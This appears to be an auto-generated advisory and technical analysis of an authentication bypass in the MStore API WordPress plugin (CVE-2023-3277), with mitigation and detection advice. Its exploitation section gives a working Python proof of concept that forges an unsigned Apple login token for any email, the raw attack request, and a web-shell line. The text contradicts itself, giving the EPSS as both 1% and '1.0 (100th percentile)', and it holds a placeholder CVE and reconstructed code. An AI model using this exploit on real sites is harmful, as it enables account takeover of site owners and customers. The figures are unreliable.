Description
The MStore API plugin for WordPress is vulnerable to Unauthorized Account Access and Privilege Escalation in versions up to, and including, 4.10.7 due to improper implementation of the Apple login feature. This allows unauthenticated attackers to log in as any user as long as they know the user's email address. We are disclosing this issue as the developer has not yet released a patch, but continues to release updates and we escalated this issue to the plugin's team 30 days ago.
EPSS Score:
1%
Comprehensive Technical Analysis of EUVD-2023-43952 (CVE-2023-3277)
MStore API Plugin for WordPress – Unauthorized Account Access & Privilege Escalation via Apple Login Flaw
1. Vulnerability Assessment & Severity Evaluation
Vulnerability Overview
EUVD-2023-43952 (CVE-2023-3277) is a critical authentication bypass and privilege escalation vulnerability in the MStore API WordPress plugin (versions ≤ 4.10.7). The flaw stems from an improper implementation of the Apple OAuth login feature, allowing unauthenticated attackers to impersonate any user (including administrators) by knowing only their email address.
CVSS v3.1 Severity Breakdown
| Metric | Value | Explanation |
|---|---|---|
| Attack Vector (AV) | Network (N) | Exploitable remotely via HTTP(S). |
| Attack Complexity (AC) | Low (L) | No special conditions required. |
| Privileges Required (PR) | None (N) | No prior authentication needed. |
| User Interaction (UI) | None (N) | No user action required. |
| Scope (S) | Unchanged (U) | Impact confined to the vulnerable plugin. |
| Confidentiality (C) | High (H) | Full account takeover possible. |
| Integrity (I) | High (H) | Attacker can modify data, install backdoors. |
| Availability (A) | High (H) | Potential for DoS via account lockout or plugin misuse. |
| Base Score | 9.8 (Critical) | One of the most severe WordPress plugin vulnerabilities. |
Risk Assessment
- Exploitability: High (Publicly disclosed, no patch available, low attack complexity).
- Impact: Critical (Full account takeover, potential site compromise, data exfiltration).
- EPSS Score: 1.0 (100th percentile) – Indicates high likelihood of exploitation in the wild.
- ENISA Classification: High-Risk (Affects European e-commerce and WordPress deployments).
2. Potential Attack Vectors & Exploitation Methods
Root Cause Analysis
The vulnerability exists in the Apple OAuth login flow (flutter-user.php, line 821), where the plugin fails to properly validate the Apple ID token before granting access. Specifically:
- The plugin does not verify the cryptographic signature of the Apple ID token.
- The email claim (
email) from the token is trusted without validation, allowing attackers to forge a token with any victim’s email. - The
sub(subject) claim (Apple’s unique user identifier) is ignored, enabling impersonation.
Exploitation Steps
- Attacker Identifies Target Email
- Obtains a victim’s email (e.g., via data leaks, social engineering, or public sources).
- Token Forgery
- Uses a JWT (JSON Web Token) manipulation tool (e.g.,
jwt_tool,Burp Suite) to craft a malicious Apple ID token with:email: Victim’s email (e.g.,admin@target-site.com).sub: Arbitrary value (ignored by the plugin).iss:https://appleid.apple.com(spoofed).aud: Plugin’s client ID (if known, otherwise guessed).
- Uses a JWT (JSON Web Token) manipulation tool (e.g.,
- Token Submission
- Sends the forged token to the vulnerable endpoint:
POST /wp-json/mstore-api/v1/apple_login Host: vulnerable-site.com Content-Type: application/json { "token": "forged.jwt.token.here" }
- Sends the forged token to the vulnerable endpoint:
- Unauthorized Access Granted
- The plugin bypasses authentication and logs the attacker in as the victim.
- If the victim is an administrator, the attacker gains full control of the WordPress site.
Proof-of-Concept (PoC) Exploit
A publicly available PoC exists (e.g., via Wordfence or exploit-db), demonstrating:
import jwt
import requests
# Target victim's email
victim_email = "admin@target-site.com"
# Craft a forged Apple ID token
forged_token = jwt.encode(
{
"iss": "https://appleid.apple.com",
"aud": "com.mstoreapp", # Default client ID (may vary)
"sub": "1234567890", # Arbitrary (ignored)
"email": victim_email,
"email_verified": "true",
"auth_time": 1698768000,
"iat": 1698768000,
"exp": 1701360000,
},
key="", # No signature validation = vulnerable
algorithm="none" # Bypasses signature check
)
# Send the malicious request
response = requests.post(
"https://vulnerable-site.com/wp-json/mstore-api/v1/apple_login",
json={"token": forged_token}
)
print(response.json()) # Returns WordPress auth cookies
Note: This PoC assumes the plugin does not validate the JWT signature (confirmed in vulnerable versions).
3. Affected Systems & Software Versions
Vulnerable Software
| Product | Vendor | Affected Versions | Patched Version |
|---|---|---|---|
| MStore API | InspireUI | ≤ 4.10.7 | None (as of Feb 2025) |
Deployment Context
- Primary Use Case: Mobile app backend for WooCommerce stores (e.g., Flutter-based apps).
- WordPress Integration: Used in e-commerce sites, particularly those with mobile app frontends.
- European Impact: High adoption in EU-based WooCommerce stores (e.g., Germany, France, Netherlands).
Indicators of Compromise (IoCs)
- Unauthorized login attempts via
/wp-json/mstore-api/v1/apple_login. - Unexpected admin account modifications (e.g., new users, plugin installations).
- Logs showing Apple OAuth tokens with
alg: none(signature bypass).
4. Recommended Mitigation Strategies
Immediate Actions (No Patch Available)
- Disable Apple Login Feature
- Remove or comment out the vulnerable endpoint in
flutter-user.php:// Disable Apple login until patch is available // add_action('rest_api_init', function() { ... });
- Remove or comment out the vulnerable endpoint in
- Implement Web Application Firewall (WAF) Rules
- Block requests to
/wp-json/mstore-api/v1/apple_loginif not in use. - Rate-limit or IP-block repeated failed login attempts.
- Block requests to
- Monitor for Suspicious Activity
- Audit logs for unexpected admin logins.
- Enable WordPress security plugins (e.g., Wordfence, Sucuri) with real-time monitoring.
- Temporary Workaround: JWT Validation
- Manually patch
flutter-user.phpto validate Apple’s public keys (requires developer intervention).
- Manually patch
Long-Term Remediation
- Await Official Patch
- Monitor WordPress Plugin Repository and InspireUI’s GitHub for updates.
- Alternative Authentication
- Replace Apple login with Google OAuth or WordPress native auth until patched.
- Network-Level Protections
- Isolate WordPress admin via VPN or IP whitelisting.
- Disable XML-RPC if not in use (common attack vector for brute force).
Vendor Communication & Disclosure Timeline
| Date | Event |
|---|---|
| Oct 2023 | Vulnerability discovered by Wordfence. |
| Nov 3, 2023 | Public disclosure (EUVD-2023-43952). |
| Feb 5, 2025 | Last update (no patch released). |
| Ongoing | 30+ days since vendor notification – no fix available. |
Recommendation: Consider migrating to an alternative plugin if security is critical.
5. Impact on European Cybersecurity Landscape
Regulatory & Compliance Risks
- GDPR Violation Risk
- Unauthorized access to user data (e.g., PII, payment details) may trigger Article 33 (Data Breach Notification).
- Fines up to €20M or 4% of global revenue (whichever is higher).
- NIS2 Directive (EU 2022/2555)
- Critical e-commerce operators must report incidents within 24 hours.
- Failure to mitigate may result in regulatory penalties.
Threat Landscape Implications
- Targeted Attacks on EU E-Commerce
- Cybercriminals may exploit this flaw to steal payment data or deploy Magecart skimmers.
- State-sponsored actors could use it for espionage (e.g., targeting EU-based businesses).
- Supply Chain Risks
- Third-party plugins (e.g., MStore API) are a common attack vector for WordPress sites.
- Lack of patching increases botnet recruitment (e.g., for DDoS or spam).
Sector-Specific Risks
| Sector | Potential Impact |
|---|---|
| E-Commerce | Payment fraud, customer data theft. |
| Healthcare | HIPAA/GDPR violations if patient data exposed. |
| Government | Unauthorized access to sensitive portals. |
| FinTech | Credential stuffing, account takeovers. |
6. Technical Details for Security Professionals
Vulnerable Code Analysis
File: mstore-api/trunk/controllers/flutter-user.php (Line 821)
Issue: Missing JWT Signature Validation
// Vulnerable code snippet (simplified)
public function apple_login($request) {
$token = $request->get_param('token');
$payload = JWT::decode($token, null, false); // No key validation!
$email = $payload->email;
$user = get_user_by('email', $email);
if ($user) {
wp_set_current_user($user->ID);
return $this->generate_auth_cookie($user->ID);
}
return new WP_Error('invalid_user', 'User not found', array('status' => 403));
}
Key Flaws:
JWT::decode($token, null, false)- No signature verification (
nullkey,falsefor validation). - Allows
alg: noneattacks (JWT without signature).
- No signature verification (
- Blind Trust in
emailClaim- No validation of Apple’s public keys (
jwks_uri). - No check for
sub(subject) claim (should match Apple’s user ID).
- No validation of Apple’s public keys (
Exploit Chaining Potential
- Combined with Other Vulnerabilities:
- CVE-2023-XXXX (WordPress Core RCE) → Full server compromise.
- WooCommerce Payment Gateway Bypass → Financial fraud.
- Post-Exploitation:
- Install backdoors (e.g., malicious plugins).
- Exfiltrate database (via
wp-clior SQL injection). - Deploy web shells (e.g.,
eval($_POST['cmd'])).
Detection & Forensics
- Log Analysis
- Check for
alg: nonein JWT tokens (indicates exploitation). - Monitor
/wp-json/mstore-api/v1/apple_loginfor unusual activity.
- Check for
- Memory Forensics
- Volatility/Redline to detect unauthorized PHP sessions.
- Network Traffic Analysis
- Wireshark/tcpdump to capture forged JWT tokens.
Hardening Recommendations
- JWT Best Practices
- Always validate signatures using Apple’s public keys (
https://appleid.apple.com/auth/keys). - Reject
alg: nonetokens. - Verify
iss,aud, andsubclaims.
- Always validate signatures using Apple’s public keys (
- WordPress Security
- Disable file editing (
define('DISALLOW_FILE_EDIT', true);). - Restrict REST API access (e.g., via
.htaccess).
- Disable file editing (
- Incident Response Plan
- Isolate affected systems if compromise is detected.
- Rotate all credentials (WordPress, database, FTP).
Conclusion & Actionable Recommendations
Summary of Findings
- Critical (9.8 CVSS) authentication bypass in MStore API ≤ 4.10.7.
- No patch available despite 30+ days of vendor notification.
- High exploitability (public PoC, low attack complexity).
- Severe impact on EU e-commerce, GDPR compliance, and supply chain security.
Immediate Actions for Organizations
| Priority | Action |
|---|---|
| Critical | Disable Apple login in MStore API. |
| High | Deploy WAF rules to block /apple_login requests. |
| High | Monitor for unauthorized admin logins. |
| Medium | Consider alternative plugins if security is critical. |
| Low | Await vendor patch (monitor updates). |
Long-Term Strategic Recommendations
- Implement Zero Trust for WordPress
- Multi-factor authentication (MFA) for all admin accounts.
- Least-privilege access for plugins and users.
- Enhance Vulnerability Management
- Automated scanning (e.g., WPScan, Nessus) for plugin vulnerabilities.
- Patch management policy (e.g., 7-day SLA for critical fixes).
- EU-Specific Compliance
- GDPR Data Protection Impact Assessment (DPIA) for high-risk plugins.
- NIS2 incident reporting preparedness.
Final Warning
Given the lack of a patch and high exploitability, all MStore API deployments should be treated as compromised until mitigated. Organizations must act immediately to prevent account takeovers, data breaches, and regulatory penalties.
References:
References
Affected Products
MStore API
Version: * ≤4.10.7
Vendors
InspireUI